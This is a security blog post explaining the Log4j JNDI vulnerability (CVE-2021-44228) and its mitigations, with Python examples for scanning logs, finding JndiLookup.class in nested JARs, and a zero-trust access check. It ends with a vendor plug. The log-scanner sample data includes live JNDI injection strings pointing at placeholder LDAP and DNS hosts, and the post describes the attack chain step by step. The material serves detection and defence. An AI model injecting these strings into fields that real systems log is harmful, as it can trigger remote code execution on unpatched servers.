In the last month, you have likely seen the Log4j exploit in the news. A critical remote code execution vulnerability, CVE-2021-44228, was discovered in December in Apache Log4j, and it has affected millions of servers. Cloudflare has reported tracking more than 100k attempts per hour to exploit this vulnerability. Microsoft has observed the vulnerability being used by multiple nation-state hacking groups from China, North Korea, Iran, and Turkey. Exploitation attempts remained high during the last week of December as well.
What is Log4j?
Apache Log4j is an open-source logging library that is widely used in almost every environment where a Java application is in use. This includes enterprise applications, cloud services, web applications, email services, and open-source software. This library is used to log security and performance information.
What is the issue?
The vulnerability leverages JNDI (Java Naming and Directory Interface) lookups, which are enabled in the default configuration of Log4j. JNDI is a Java API that clients use to look up data and objects stored in directory and naming services such as Lightweight Directory Access Protocol (LDAP), Domain Name System (DNS), and Remote Method Invocation (RMI). The API takes a string as its input parameter, and a remote attacker can exploit this input to execute arbitrary code. Log4j does not sanitize the input, allowing an attacker to supply a string, as a variable in a log message, that causes a remote Java class file to be loaded and invoked. An attacker with the ability to control log messages can execute remote code loaded from LDAP servers when message lookup substitution is enabled and gain full control of the affected server. An attacker exploits this vulnerability through the following steps:
- An attacker creates a specially crafted string containing the malicious payload and sends it to a vulnerable system. This string could be inserted in any of the fields that the system logs, such as:
  - User-Agent
  - Device name or email address
- The string points to an attacker-controlled LDAP or DNS server, such as
- This string is then sent to Log4j for logging.
- The vulnerable system uses JNDI to query the attacker-controlled LDAP or DNS server.
- The attacker-controlled LDAP or DNS server responds with a remote Java class file (exploit.class).
- The Java class is downloaded and executed.
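Because the payload travels inside fields the application logs (User-Agent, device names, e-mail addresses), the first place a defender can see it is in those same logs. The following is an added example, not code from the original post: a small Python scanner that pulls every `${...}` lookup out of a log line with proper brace matching, flags any lookup that invokes `jndi:`, and also flags lookups that nest another lookup, since nesting is what lets the final text be assembled at log time and is not something a legitimate browser or e-mail address contains. The log lines are constructed for this example; the addresses and hostnames are placeholders.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample log lines for this example (not taken from the page).
# Lines 1 and 2 carry a JNDI lookup in a logged field (User-Agent, e-mail
# address), line 3 merely mentions "jndi" in a URL path, line 4 carries a
# nested lookup with no "jndi" text at all, and line 5 is ordinary traffic.
SAMPLE_LOGS = [
    '203.0.113.7 - - [13/Dec/2021:08:15:02 +0000] "GET / HTTP/1.1" 200 1024 "-" "${jndi:ldap://203.0.113.50:1389/a}"',
    '{"event":"signup","email":"${jndi:dns://203.0.113.51/id}","client":"203.0.113.8"}',
    '203.0.113.9 - - [13/Dec/2021:08:16:30 +0000] "GET /docs/jndi-guide.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '{"event":"device_rename","device_name":"${${env:HOSTNAME}:-laptop}","client":"203.0.113.10"}',
    '203.0.113.11 - - [13/Dec/2021:08:17:05 +0000] "POST /api HTTP/1.1" 204 0 "-" "curl/7.79.1"',
]

JNDI_RE = re.compile(r"jndi\s*:", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    lookup: str
    reason: str


def extract_lookups(text: str) -> List[str]:
    """Return each top-level ${...} lookup in text, matching braces with nesting."""
    lookups = []
    i = 0
    while True:
        start = text.find("${", i)
        if start == -1:
            return lookups
        depth = 0
        j = start
        end = -1
        while j < len(text):
            if text.startswith("${", j):
                depth += 1
                j += 2
                continue
            if text[j] == "}":
                depth -= 1
                if depth == 0:
                    end = j
                    break
            j += 1
        if end == -1:
            # Unterminated lookup: keep the tail so it is still examined.
            lookups.append(text[start:])
            return lookups
        lookups.append(text[start:end + 1])
        i = end + 1


def classify_lookup(lookup: str) -> Optional[str]:
    """Why a lookup found in an untrusted field is suspicious, or None if it is not."""
    body = lookup[2:]  # drop the leading "${"
    if JNDI_RE.search(body):
        return "jndi lookup"
    if "${" in body:
        # A nested lookup is resolved by Log4j before the outer one, so the
        # literal text need not contain "jndi"; nesting in user input is itself a signal.
        return "nested lookup"
    return None


def scan_logs(lines: List[str]) -> List[Finding]:
    """Scan log lines and return one Finding per suspicious lookup."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        for lookup in extract_lookups(line):
            reason = classify_lookup(lookup)
            if reason is not None:
                findings.append(Finding(line_no, lookup, reason))
    return findings


if __name__ == "__main__":
    for f in scan_logs(SAMPLE_LOGS):
        print(f"line {f.line_no}: {f.reason}: {f.lookup}")
```

Run it against the constructed lines and it reports lines 1, 2 and 4 and stays quiet on line 3, where "jndi" appears only as ordinary text. The same two functions can be pointed at web-server access logs or application logs as part of the perimeter-log review recommended below.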
Severity of the issue
The impact of the exploit is very broad due to the nature of the vulnerability. Log4j is widely used by developers, and to exploit the vulnerability an attacker only needs to cause the target system to log a specially crafted message. Attackers are extensively exploiting this vulnerability for crypto mining and other types of malware attacks. Cybercriminals race to exploit a new vulnerability before it is remediated. In the case of Log4j, because it is used by developers in almost every Java application, it gives cybercriminals a larger window to exploit the vulnerability before an organization can patch its entire network and the applications on it. Security experts have warned that because of Java packaging, the vulnerable library can sit several layers deep within an application and is not easily detected by scanners. Though the exploit is currently aimed at crypto mining, it could be used by serious threat actors to attack high-value targets such as financial institutions and federal agencies. Attackers are scanning both Windows and Linux systems for this vulnerability.
How to mitigate the risk?
An organization can follow the below recommendations to handle this vulnerability:
- To identify the affected applications and systems, deploy scanning tools and scripts that detect vulnerable systems in the environment.
- As a workaround, the JndiLookup class can be removed from the class path.
- Apply the corresponding security patches for public-facing applications and systems immediately.
- Apply the corresponding security patches for internal applications and systems as soon as possible.
- Check your network perimeter logs for indicators of compromise.
- If you are using a WAF, create rules specific to log4j.
- Isolate the vulnerable systems through network segmentation or other means.
- Monitor for suspicious activities with particular attention to applications that establish remote connections.
- Consider implementing zero trust architecture.
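The first two recommendations (find the vulnerable library, then remove the JndiLookup class where patching is not yet possible) are where the "several layers deep" packaging problem bites: a plain file scan misses a log4j-core JAR that is bundled inside a WAR or fat JAR. The following is an added example, not code from the original post or from the Apache project: a Python scanner that opens every JAR/WAR/EAR under a directory, recurses into archives nested inside them, and reports each copy of `JndiLookup.class`, plus a helper that rewrites a top-level JAR without that class. The directory tree it scans is constructed in a temporary directory, with placeholder bytes standing in for real class files; the file names are assumptions for the example.

```python
import io
import os
import tempfile
import zipfile
from pathlib import Path
from typing import List, Tuple

# Path of the class the workaround removes (as in the Apache advisory).
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = {".jar", ".war", ".ear"}


def scan_jar_bytes(data: bytes, label: str) -> List[str]:
    """Return a "outer!inner!class" label for every JndiLookup.class in an archive,
    descending into archives nested inside it (WEB-INF/lib, fat JARs, ...)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name == JNDI_CLASS:
                hits.append(f"{label}!{name}")
            elif Path(name).suffix.lower() in ARCHIVE_SUFFIXES:
                hits.extend(scan_jar_bytes(zf.read(name), f"{label}!{name}"))
    return hits


def scan_directory(root: str) -> List[str]:
    """Walk a directory tree and report every JndiLookup.class, nested or not."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            try:
                hits.extend(scan_jar_bytes(path.read_bytes(), str(path)))
            except zipfile.BadZipFile:
                continue  # not a real archive despite the suffix
    return hits


def remove_jndi_lookup(jar_path: str) -> bool:
    """Rewrite a top-level JAR without JndiLookup.class. Returns True if it was present.
    Nested copies are only reported by the scanner; repackage those applications
    or patch them instead of editing the archive in place."""
    jar_path = Path(jar_path)
    tmp = jar_path.with_suffix(jar_path.suffix + ".tmp")
    removed = False
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(tmp, "w") as dst:
        for item in src.infolist():
            if item.filename == JNDI_CLASS:
                removed = True
                continue
            dst.writestr(item, src.read(item.filename))
    os.replace(tmp, jar_path)  # atomic swap so a crash never leaves a half-written JAR
    return removed


def build_demo_tree(root: str) -> None:
    """Constructed fixture: a log4j-core-like JAR in lib/, and a WAR that nests a copy."""
    root_path = Path(root)
    (root_path / "lib").mkdir(parents=True, exist_ok=True)
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder, not a real class file
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
    (root_path / "lib" / "log4j-core-example.jar").write_bytes(inner.getvalue())
    with zipfile.ZipFile(root_path / "app.war", "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-example.jar", inner.getvalue())
        zf.writestr("WEB-INF/classes/App.class", b"\xca\xfe\xba\xbe")


def demo() -> Tuple[List[str], bool, List[str]]:
    """Build the fixture, scan, apply the workaround to the top-level JAR, rescan."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        before = scan_directory(tmp)
        removed = remove_jndi_lookup(str(Path(tmp) / "lib" / "log4j-core-example.jar"))
        after = scan_directory(tmp)
        return before, removed, after


if __name__ == "__main__":
    before, removed, after = demo()
    print("before:", *before, sep="\n  ")
    print("removed from top-level jar:", removed)
    print("after:", *after, sep="\n  ")
```

The second scan still lists the copy inside `app.war`, which is the point: the class-removal workaround is only a stopgap for JARs you can edit directly, and the nested findings are the ones that need the application itself patched or repackaged.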
Zero Trust Architecture
An important element in all malware attacks is that the attacker uses the organization’s applications and systems against the organization itself. Organizations should consider implementing zero trust architecture to protect the organization from its own applications and systems. Zero trust is an approach that secures an organization by rejecting implicit trust and continuously validating every request. It is based on the principle of “never trust, always verify”. Every access request is authenticated, authorized, and encrypted before access to the resource is granted. Zero trust architecture is based on three key principles:
- Verify explicitly: always authenticate and authorize requests based on user identity, device, location, service, workload, and other parameters.
- Use least privilege: restrict a user’s access to only those resources required for the job role. Use risk-based policies and data protection to secure data and systems.
- Assume breach and inspect every activity: use analytics to gain visibility of the network, systems, and applications, and improve defenses.
Identity has become the new network perimeter, and verification of these identities is central to zero-trust architecture. Instead of identification based on IP address, it is based on verifying the user’s identity using Identity and Access Management (IAM), Multi-Factor Authentication (MFA) and Public Key Infrastructure (PKI). In addition to identity verification, organizations need to verify devices as well, using certificates and key pairs, to strengthen the security of the organization. Data needs to be protected both at rest and in transit. This makes encryption, and PKI in particular, an important part of implementing zero-trust architecture. PKI allows an organization to establish machine identity and encrypt communications between networks. Organizations can use PKI to issue digital certificates to users, machines, web applications and mobile devices, providing secure network authentication.
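The three principles above, and the point that a source IP address no longer confers trust, are easiest to see as a per-request policy decision. The following is an added example, not code from the original post: a Python evaluator in which every request is checked for identity, MFA and an enrolled device certificate (verify explicitly), must match an explicit role permission (least privilege), and is written to an audit log whether allowed or denied (assume breach). The user directory, role permissions and device fingerprints are constructed stand-ins for an IAM system and the device certificates a PKI would issue; the corporate network range is used only to annotate the audit record, never to grant access.

```python
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# Constructed inventories standing in for an IAM system and a device registry
# (assumptions for this example, not from the page).
ROLE_OF_USER: Dict[str, str] = {"alice": "payroll-analyst", "bob": "developer"}
ROLE_PERMISSIONS: Dict[str, Set[Tuple[str, str]]] = {
    "payroll-analyst": {("payroll-db", "read")},
    "developer": {("ci-server", "read"), ("ci-server", "deploy")},
}
# Fingerprints of device certificates issued by the organization's PKI, mapped to owner.
ENROLLED_DEVICES: Dict[str, str] = {
    "sha256:1111aaaa": "alice",
    "sha256:2222bbbb": "bob",
}
# Recorded for analytics only; being "inside" grants nothing.
CORPORATE_NET = ipaddress.ip_network("10.0.0.0/8")


@dataclass(frozen=True)
class AccessRequest:
    user: str
    mfa_verified: bool
    device_fingerprint: Optional[str]  # from the client certificate presented over mTLS
    source_ip: str
    resource: str
    action: str


@dataclass
class Decision:
    allowed: bool
    reasons: List[str]  # empty when allowed, otherwise every failed check


AUDIT_LOG: List[dict] = []


def evaluate(req: AccessRequest) -> Decision:
    reasons: List[str] = []
    # Verify explicitly: identity, MFA and device are checked on every request.
    role = ROLE_OF_USER.get(req.user)
    if role is None:
        reasons.append("unknown user")
    if not req.mfa_verified:
        reasons.append("MFA not completed")
    owner = ENROLLED_DEVICES.get(req.device_fingerprint or "")
    if owner is None:
        reasons.append("device certificate not enrolled")
    elif owner != req.user:
        reasons.append("device enrolled to a different user")
    # Least privilege: the role must explicitly grant this action on this resource.
    if role is not None and (req.resource, req.action) not in ROLE_PERMISSIONS.get(role, set()):
        reasons.append(f"role {role} has no {req.action} on {req.resource}")
    decision = Decision(allowed=not reasons, reasons=reasons)
    # Assume breach: every decision, allowed or not, is recorded for later analytics.
    AUDIT_LOG.append({
        "user": req.user, "resource": req.resource, "action": req.action,
        "source_ip": req.source_ip,
        "on_corporate_net": ipaddress.ip_address(req.source_ip) in CORPORATE_NET,
        "allowed": decision.allowed, "reasons": list(reasons),
    })
    return decision


def demo() -> List[Decision]:
    """Three constructed requests showing allow, unenrolled-device deny, and out-of-role deny."""
    requests = [
        # Remote worker, enrolled device, MFA done, in-role resource: allowed.
        AccessRequest("alice", True, "sha256:1111aaaa", "198.51.100.4", "payroll-db", "read"),
        # Same user on the corporate network but from an unenrolled device: denied.
        AccessRequest("alice", True, None, "10.1.2.3", "payroll-db", "read"),
        # Enrolled developer asking for a resource outside the role: denied.
        AccessRequest("bob", True, "sha256:2222bbbb", "10.1.2.4", "payroll-db", "read"),
    ]
    return [evaluate(r) for r in requests]


if __name__ == "__main__":
    for d, entry in zip(demo(), AUDIT_LOG):
        print(entry["user"], entry["resource"], "allowed" if d.allowed else "denied", d.reasons)
```

The second request is the one worth noticing: it comes from an address inside the corporate range and would have passed a perimeter-based check, yet it is denied because the device presented no enrolled certificate. Reasons are accumulated rather than short-circuited so the audit record shows every failed control, not just the first.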
Organizations need to strengthen the security of their systems and applications against such vulnerabilities and exploits, and to do this they need to move towards a zero-trust architecture. Implementing a PKI is important for zero trust architecture and ensuring secure network authentication for users, systems, and web applications. Encryption Consulting is a customer-focused cyber security consulting firm providing services to various clients on implementing and managing PKI in their environments. To see how we can help your organization, visit our website at www.encryptionconsulting.com.